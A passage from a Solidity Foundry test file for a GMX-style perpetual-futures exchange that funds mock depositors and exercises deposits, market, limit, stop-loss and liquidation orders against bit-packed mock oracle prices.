_marketPropsCwnt.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.shortToken), 1000e18);\\n \\n \\n // set max open interest for each market\\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, true), 1e39); // 1B $ \\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, false), 1e39); // 1B $\\n\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, true), 10**29); // maxPnlFactor = 10% for long\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, false), 10**29); // maxPnlFactor = 10% for short\\n // _dataStore.setBool(Keys.cancelDepositFeatureDisabledKey(address(_depositHandler)), true);\\n _dataStore.setBool(Keys.cancelOrderFeatureDisabledKey(address(_orderHandler), uint256(Order.OrderType.MarketIncrease)), true);\\n\\n addFourSigners();\\n address(_wnt).call{value: 10000e18}("""");\\n depositor1 = address(0x801);\\n depositor2 = address(0x802);\\n depositor3 = address(0x803);\\n\\n // make sure each depositor has some tokens.\\n _wnt.transfer(depositor1, 1000e18);\\n _wnt.transfer(depositor2, 1000e18);\\n _wnt.transfer(depositor3, 1000e18); \\n _usdc.transfer(depositor1, 1000e18);\\n _usdc.transfer(depositor2, 1000e18);\\n _usdc.transfer(depositor3, 1000e18);\\n _tokenA.transfer(depositor1, 1000e18);\\n _tokenB.transfer(depositor1, 1000e18);\\n _tokenC.transfer(depositor1, 1000e18); \\n\\n printAllTokens(); \\n }\\n\\n error Unauthorized(string);\\n // error Error(string);\\n\\n\\nfunction testLimit() public{\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(""Experiment 1 is completed.""); \\n \\n // console2.log(""PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP"");\\n \\n key = createMarketSwapOrder(depositor1, address(_wnt), 1e15); // create a deposit at block 3 which is within range (2, 6) \\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(""Experiment 2 is completed.""); \\n \\n\\n console2.log(""\\n\\n depositor 1 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1001e30, 106000000000000, true); // \\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(""Experiment 3 is completed.""); \\n \\n \\n\\n console2.log(""\\n\\n depositor 2 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 13e30, 101000000000000, false); // 110 usdc as collateral\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(""Experiment 4 is completed.""); \\n \\n\\n\\n console2.log(""PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP"");\\n vm.warp(2 days);\\n setIndexTokenPrice(priceParams, 98, 100); // send 20e18 USDC, increase $13.123 in a long position with trigger price 101\\n key = createLimitIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 23e18, 1.1234567e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""Experiment 5 is completed.\\n""); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n /*\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(""Experiment 7 for is completed.""); \\n */\\n}\\n\\nfunction testMarketDecrease() public{\\n \\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(""Experiment 1 is completed.""); \\n \\n \\n \\n \\n console2.log(""\\n\\n depositor 2 deposit into marketProps1"");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(""Experiment 2 is completed.""); \\n \\n \\n console2.log(""\\n\\n depositor 1 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1e25, 106000000000000, true); // \\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(""Experiment 3 is completed.""); \\n \\n \\n\\n console2.log(""\\n\\n depositor 2 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 1e25, 101000000000000, false); // 110 usdc as collateral\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(""Experiment 4 is completed.""); \\n \\n console2.log(""********************************************"");\\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 70000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(""a market desced order created with key: "");\\n console2.logBytes32(key);\\n console2.log(""\\nExecuting the order// rest of code""); \\n setIndexTokenPrice(priceParams, 60, 65); // we have a profit for a short position\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(""Experiment 5 is completed.""); \\n\\n printAllTokens();\\n} \\n\\n \\n\\nfunction testLiquidation() public{\\n // blockrange (2, 6)\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(""Experiment 1 is completed.""); \\n \\n \\n \\n \\n console2.log(""\\n\\n depositor 2 deposit into marketProps1"");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(""Experiment 2 is completed.""); \\n \\n \\n console2.log(""\\n\\n depositor 1 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 10e18, 1e25, 106000000000000, true);\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(""Experiment 3 is completed.""); \\n \\n \\n\\n console2.log(""\\n\\n depositor 2 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 100e18, 1e25, 101000000000000, false);\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(""Experiment 4 is completed.""); \\n \\n \\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 106000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(""a market desced order created with key: "");\\n console2.logBytes32(key);\\n console2.log(""\\nExecuting the order// rest of code""); \\n setIndexTokenPrice(priceParams, 84, 90);\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(""Experiment 5 is completed.""); \\n \\n \\n\\n \\n // depositor3 will execute a LimitIncrease Order now\\n key = createMarketIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 20e18, 200e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""Experiment 6 is completed.\\n""); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(""Experiment 7 for is completed.""); \\n \\n // depositor3 creates a stopLossDecrease order\\n setIndexTokenPrice(priceParams, 97, 99);\\n key = createStopLossDecrease(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 95000000000000, 92000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(""a StopLossDecrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n // Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams);\\n console2.log(""Experiment 8 is completed.""); \\n \\n \\n console2.log(""\\n\\n*************************************************\\n\\n"");\\n\\n\\n // depositor3 creates a Liquidation order\\n setIndexTokenPrice(priceParams, 75, 75);\\n console2.log(""Liquidate a position// rest of code"");\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n _liquidationHandler.executeLiquidation(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true, priceParams);\\n console2.log(""Experiment 9 is completed.""); \\n \\n\\n // printPoolsAmounts();\\n printAllTokens();\\n\\n \\n \\n \\n}\\n\\nfunction printAllTokens() startedCompleted(""printAllTokens"") public\\n{\\n console2.log(""\\nTokens used in this test:"");\\n console2.log(""_wnt: ""); console2.logAddress(address(_wnt));\\n console2.log(""_usdc: ""); console2.logAddress(address(_usdc));\\n console2.log(""_sol: ""); console2.logAddress(address(_sol));\\n console2.log(""_tokenA: ""); console2.logAddress(address(_tokenA));\\n console2.log(""_tokenB: ""); console2.logAddress(address(_tokenB));\\n console2.log(""_tokenC: ""); console2.logAddress(address(_tokenC));\\n console2.logString(""test contract address:""); console2.logAddress(address(this));\\n \\n console2.log(""_marketProps1 market token: ""); console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(""_marketPropsAB market token: ""); console2.logAddress(address(_marketPropsAB.marketToken));\\n console2.log(""_marketPropsBC market token: ""); console2.logAddress(address(_marketPropsBC.marketToken));\\n console2.log(""_marketProps1Cwnt market token: ""); console2.logAddress(address(_marketPropsCwnt.marketToken));\\n console2.log(""\\n"");\\n \\n \\n}\\n\\n\\nfunction printMarketTokenAmount() public \\n{ console2.log(""Market token address: "");\\n console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(""depositor1 market token amount: %d"", IERC20(_marketProps1.marketToken).balanceOf(depositor1));\\n console2.log(""depositor2 market token amount: %d"", IERC20(_marketProps1.marketToken).balanceOf(depositor2));\\n console2.log(""depositor3 market token amount: %d"", IERC20(_marketProps1.marketToken).balanceOf(depositor3));\\n}\\n\\nfunction printLongShortTokens(address account) public\\n{\\n console2.log(""balance for ""); console2.logAddress(account);\\n console2.log(""_wnt balance:"", _wnt.balanceOf(account));\\n console2.log(""usdc balance:"", _usdc.balanceOf(account));\\n}\\n\\n\\n\\n\\nfunction addFourSigners() private {\\n _oracleStore.addSigner(address(901));\\n _oracleStore.addSigner(address(902)); \\n _oracleStore.addSigner(address(903)); \\n _oracleStore.addSigner(address(904)); \\n}\\n\\n\\nfunction setIndexTokenPrice(OracleUtils.SetPricesParams memory priceParams, uint256 minP, uint256 maxP) public\\n{\\n uint256 mask1 = ~uint256(type(uint96).max); // (32*3 of 1's)\\n console2.logBytes32(bytes32(mask1));\\n\\n uint256 minPrice = minP;\\n minPrice = minPrice << 32 | minP;\\n minPrice = minPrice << 32 | minP;\\n\\n uint256 maxPrice = maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n\\n priceParams.compactedMinPrices[0] = (priceParams.compactedMinPrices[0] & mask1) | minPrice;\\n priceParams.compactedMaxPrices[0] = (priceParams.compactedMaxPrices[0] & mask1) | maxPrice;\\n}\\n\\n\\nfunction createSetPricesParams() public returns (OracleUtils.SetPricesParams memory) {\\n uint256 signerInfo = 3; // signer 904\\n signerInfo = signerInfo << 16 | 2; // signer 903\\n signerInfo = signerInfo << 16 | 1; // signer 902\\n signerInfo = signerInfo << 16 | 3; // number of singers\\n // will read out as 902, 903, 904 from the lowest first\\n\\n // the number of tokens, 6\\n address[] memory tokens = new address[](6);\\n tokens[0] = address(_sol);\\n tokens[1] = address(_wnt);\\n tokens[2] = address(_usdc);\\n tokens[3] = address(_tokenA);\\n tokens[4] = address(_tokenB);\\n tokens[5] = address(_tokenC);\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedMinOracleBlockNumbers = new uint256[](2);\\n compactedMinOracleBlockNumbers[0] = block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n\\n compactedMinOracleBlockNumbers[1] = block.number+1;\\n compactedMinOracleBlockNumbers[1] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n \\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n \\n uint256[] memory compactedMaxOracleBlockNumbers = new uint256[](2);\\n compactedMaxOracleBlockNumbers[0] = block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n\\n compactedMaxOracleBlockNumbers[1] = block.number+5; \\n compactedMaxOracleBlockNumbers[1] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedOracleTimestamps = new uint256[](2);\\n compactedOracleTimestamps[0] = 9;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 8;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n \\n compactedOracleTimestamps[1] = 9;\\n compactedOracleTimestamps[1] = compactedOracleTimestamps[0] << 64 | 8;\\n \\n\\n // must be equal to the number of tokens, 8 for each, so 8*6= 48, only need one element\\n uint256[] memory compactedDecimals = new uint256[](1);\\n compactedDecimals[0] = 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 100 101 102\\n // wnt: 200 201 203\\n // USDC 1 1 1\\n // tokenA 100 101 102\\n // tokenB 200 202 204\\n // tokenC 400 404 408\\n\\n uint256[] memory compactedMinPrices = new uint256[](3);\\n compactedMinPrices[2] = 408; \\n compactedMinPrices[2] = compactedMinPrices[2] << 32 | 404;\\n\\n compactedMinPrices[1] = 400;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 204;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 202;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 200;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 102;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 101;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 100;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 1;\\n \\n compactedMinPrices[0] = 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 203;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 201;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 200;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 102;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 101;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 100;\\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMinPricesIndexes = new uint256[](1);\\n compactedMinPricesIndexes[0] = 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 105 106 107\\n // wnt: 205 206 208\\n // USDC 1 1 1\\n // tokenA 105 106 107\\n // tokenB 205 207 209\\n // tokenC 405 409 413\\n uint256[] memory compactedMaxPrices = new uint256[](3);\\n compactedMaxPrices[2] = 413;\\n compactedMaxPrices[2] = compactedMaxPrices[2] << 32 | 409;\\n \\n compactedMaxPrices[1] = 405;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 209;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 207;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 205;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 107;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 106;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 105;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 1;\\n\\n compactedMaxPrices[0] = 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 208;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 206; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 205; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 107;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 106;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 105;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMaxPricesIndexes = new uint256[](1);\\n compactedMaxPricesIndexes[0] = 1; \\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n \\n // 3 signers and 6 tokens, so we need 3*6 signatures\\n bytes[] memory signatures = new bytes[](18);\\n for(uint i; i<18; i++){\\n signatures[i] = abi.encode(""SIGNATURE"");\\n }\\n address[] memory priceFeedTokens;\\n\\n OracleUtils.SetPricesParams memory priceParams = OracleUtils.SetPricesParams(\\n signerInfo,\\n tokens,\\n compactedMinOracleBlockNumbers,\\n compactedMaxOracleBlockNumbers,\\n compactedOracleTimestamps,\\n compactedDecimals,\\n compactedMinPrices, \\n compactedMinPricesIndexes,\\n compactedMaxPrices, \\n compactedMaxPricesIndexes, \\n signatures, \\n priceFeedTokens\\n );\\n return priceParams;\\n}\\n\\n/* \\n* The current index token price (85, 90), a trader sets a trigger price to 100 and then acceptabiel price to 95.\\n* He like to long the index token. \\n* 1. Pick the primary price 90 since we long, so choose the max\\n* 2. Make sure 90 < 100, and pick (90, 100) as the custom price since we long\\n* 3. Choose price 95 since 95 is within the range, and it is the highest acceptible price. Choosing 90 \\n* will be in favor of the trader\\n* \\n*/\\n\\nfunction createMarketSwapOrder(address account, address inputToken, uint256 inAmount) public returns(bytes32)\\n{ \\n address[] memory swapPath = new address[](1);\\n swapPath[0] = _marketProps1.marketToken;\\n // swapPath[0] = _marketPropsAB.marketToken;\\n // swapPath[1] = _marketPropsBC.marketToken;\\n // swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account; // the account is the receiver\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = account; // set myself as the ui receiver\\n // params.addresses.market = marketToken;\\n params.addresses.initialCollateralToken = inputToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n // params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n params.numbers.initialCollateralDeltaAmount = inAmount ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(inputToken).transfer(address(_orderVault), inAmount); // this is the real amount\\n\\n\\n // params.numbers.triggerPrice = triggerPrice;\\n // params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n // params.numbers.initialCollateralDeltaAmount = inAmount;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketSwap;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n // params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n}\\n\\n\\n\\nfunction createLiquidationOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.Liquidation;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createStopLossDecrease(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new 